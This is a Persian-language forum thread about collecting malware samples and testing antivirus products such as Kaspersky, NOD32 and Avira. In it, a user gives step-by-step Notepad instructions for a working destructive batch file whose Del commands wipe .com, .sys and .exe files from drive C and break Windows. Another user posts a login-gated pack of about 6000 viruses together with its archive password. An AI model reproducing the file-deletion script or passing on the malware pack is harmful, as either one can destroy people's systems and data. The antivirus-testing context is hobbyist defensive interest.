دانلود ویروس، تروجان، بررسی مخرب ها و تست آنتی‌ویروس ╣══ مقررات پست اول حتما مطالعه شود ══╠

[mohsen_1363]

تست پست 383
norton
avira
malwarebytes

هیچ کدوم با اسکن شناسایی نکردن
اجراش دیگه نکردم

[Dr Hannibal]

خب دکتر جان, بالاخره یکی از مدیران انجمن کسپرسکی اومد و جوابگو شدو توضیحات لازم رو دادم.

چیزی که من متوجه شدم این بود که scr هم یک فایل اجرایی هست. جالب بود.

داشتم این پست رو نقل قول میکردم یاد ویروس های bat افتادم. فکر نکنم ساده تر و نخودی تر از این ویروس ها وجود داشته باشه.

یه دونه از این ویروس ها ساختم با اپ کسپر چک کنم ببینم چطوره شانسی توی توتال هم آپ کردم نتیجه واقعا شرمسار کننده بود

حالا بد نیست این نتیجه ای که من دیدم رو هم دوستان ببینند.

نت پد ویندوز رو باز کنید.

این متن رو درونش کپی کنید.


@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s


سپس save as رو بزنید و یک اسم دلخواه با پسوند bat بهش بدین. مثلا بشه doki.bat

حالا شما یک ویروس ساختید که فایل های سیستمی ویندوز رو پاک میکنه با اجرا شدنش ونتیجه مرگ ویندوز. فایلی که ساختید رو به هیج وجه اجرا نکنید.....

من این رو توی توتال آپ کردم نتیجه رو ببینید چه آنتی ویروس های معروفی متاسفانه ساده ترین ویروس رو شناسایی نکردند.

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

البته از این دستور ها بسیاز زیاده. به این ویروس ها میگن کشنده فایل.

جالب بود نه ؟

[Ava UK]

خب دکتر جان, بالاخره یکی از مدیران انجمن کسپرسکی اومد و جوابگو شدو توضیحات لازم رو دادم.

توضیحات از زبان Lucian Bara مدیر انجمن کسپرسکی:
Applicatio Control در کل هسته اصلی را آنالیز و بررسی میکند نه فقط exe. ها را. به همیل دلیل یک فایل exe که نامش عوض شده باشه همچنان اسکن خواهد شد. در ادامه Application Control نمیتونه در مقابل فایل های inf. و یا xml. از شما محافظت بکنه به خاطر اینکه اینها فایل های اجرایی نیستند. یک فایل text میتونه اجزایی از یک مخربی باشه که قادر به اجرا شدن هست. اجازه بده اینطوری بگیم که مثلا یک فایل inf. قسمتی برای اجرا کردن exe. از طریق تنظیمات اجرای اتوماتیک ویندوز است اما فایل اجرایی exe تنها فایلی است که میتونه کاری بکنه / سیستم را آلوده بکنه. inf. و xml. نمیتونند کاری بکنند و امکان این وجود نداره که بشه اینها رو کنترل کرد چون اینها نمیتونند بعنوان یک پروسه اجرا بشند و کاری را انجام دهند.

یک فایل scr. یک فایل اجرایی هست , و اگر اجرا بشه درست مانند یک فایل اجرایی exe. در Application Control باهاش برخورد میشه.

خب تا اینجا توضیحاتی بود که Lucian داد. اگر در ترجمه بعضی جاها رو تغییر دادم به خاطر این بود که با فارسی جور در نمیومد و برای فهم موضوع باید تغییر میکردند.

در ادامه پست بالا.

بعد از اینکه این جواب رو از طرف یکی از مدیران انجمن کسپرسکی دریافت کردم. KIS رو بدون استفاده از VMware امتحان کردم.

چون فایل I love u Saghar توسط دیتابیس کسپرسکی شناسایی میشه بنابراین قسمت File Antivirus کسپرسکی را غیر فعال کردم تا از دیتابیسش برای شناسایی استفاده نکنه.

برای اجرا کردن فایل I love u saghar.scr از Safe Run یا همان Sand Box کسپرسکی هم استفاده نکردم چون ما میخواستیم فقط Application Control را امتحان کنیم.

تنظیم قسمت app control برای فایل های ناشناخته و بدون امضای دیجالی بر روی untrasted قرار داره.

بعد از کار های بالا فایل I love u saghar.scr را با دابل کلیک اجرا کردم تا سیستم من رو آلوده کنه و درایو هامو به داریوهای غیر سیستمی تبدیل کنه. اما نتیجه این شد که کسپرسکی اجازه اجرا شدن بهش رو نداد و اون رو در قسمت untrusted بصورت اتوماتیک و بدون دخالت من ثبت کرد.




برای اینکه مطمئن بشم سیستم من واقعا توسط کسپرسکی یا بهتره بگیم Application Control محافظت شد یا نه با برنامه های زیر سیستم رو اسکن کردم.

Avira Antivir
Hitman Pro
Malwarebytes Antimalware

برای پیدا کردن روتکیت ها هم از GMER و SysInspector استفاده کردم.

نتیجه: در سیستم هیچی پیدا نشد.
برنده: KIS 2010 بدون آنتی ویروس.

[Dr Hannibal]

در ادامه پست بالا.
بعد از کار های بالا فایل I love u saghar.scr را با دابل کلیک اجرا کردم تا سیستم من رو آلوده کنه و درایو هامو به داریوهای غیر سیستمی تبدیل کنه. اما نتیجه این شد که کسپرسکی اجازه اجرا شدن بهش رو نداد و اون رو در قسمت untrusted بصورت اتوماتیک و بدون دخالت من ثبت کرد.

عالی

[mohsenpj]

با سلام
این هم لینکه 6000 ویروسه نسبتا قدیمی

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

pass: auToeXeCw0rm
فقط هر چی هم موند به هیچ عنوان اجراشون نکنید.
من با نود32 تست کردم از 5936 فایله ویروسی تعداد 5629 تا فایل رو ویروس شناخت و حذف کرد. حدود 307 فایل باقی موند.
شما هم با بقیه آنتی ویروسها تست کنید و نتیجه رو اطلاع رسانی کنید.
مرسی

[*hamedkhatar*]

شما چطوری اکسترکت کردی؟
من KIS 2011 دارم اومدم اکسترکت کنم یه هو دیدم کسپر عصبانی شده از اتاق دویدم رفتم بیرون گفتم حالا همه چی رو میترکونه
بعد از چند دقیقه که برگشتم دیدم اجازه نداده هیچ کدوم از فایلها از فایل فشرده بیرون بیاند
جدا عصبانی بود
خواستم برای اکسترکت کسپر رو خواموش کنم ولی گفتم شاید خطرناک باشه
هنوزم با ویروسها درگیره فقط خدا کنه شکست نخوره نامردا کله سیستم رو محاصره کردند...

[mohsenpj]

شما چطوری اکسترکت کردی؟
من KIS 2011 دارم اومدم اکسترکت کنم یه هو دیدم کسپر عصبانی شده از اتاق دویدم رفتم بیرون گفتم حالا همه چی رو میترکونه
بعد از چند دقیقه که برگشتم دیدم اجازه نداده هیچ کدوم از فایلها از فایل فشرده بیرون بیاند
جدا عصبانی بود
خواستم برای اکسترکت کسپر رو خواموش کنم ولی گفتم شاید خطرناک باشه
هنوزم با ویروسها درگیره فقط خدا کنه شکست نخوره نامردا کله سیستم رو محاصره کردند...

خب حامد جان من اول فایل رو کپی میکنم توی exclusion معرفی شده در آنتی ویروسم و همونجا اکسترکتشون کردم. بعد دوباره توی فایله اکسترکت شده اومدم داخلش و فولدر رو بدون پسورد Rar کردم. بعدش اون فایله رار رو توی یک درایوه دیگه کپی کردم و سپس اسکن کردم.
البته خیالت راحت باشه. این ویروسها قدیمین و حتما کسپر همه رو میشناسه. فقط چون زیادن آنتی ویورس شوکه میشه که یه دفعه اینهمه ویروس از کجا اومد

[*hamedkhatar*]

این که همه رو میشناسه که مطمعنم چون من به کسپر ایمان دارم
فقط هنوز در حال کشتنه
نمیدونم این خون و خون ریزی کی تموم میشه

[rassool]

[Dr Hannibal]

دوستان توی پست های قبل توضیح داده شد اسکن object اصلا نشون دهنده تعداد ویروس های پاک شده نیست و روشش هم اعلام شد.

فردا من یک سری از این فایل ها را که آنتی ویروس شما شناسایی نکرده یا حتی به عنوان ویروس شناسایی کرده رو به صورت رندم آنالیز می کنیم تا ببینیم اصلا ویروس هست یا نه. فکر نمیکنم توی این پک 6000 ویروس باشه. حالا تا فردا مشخص میشه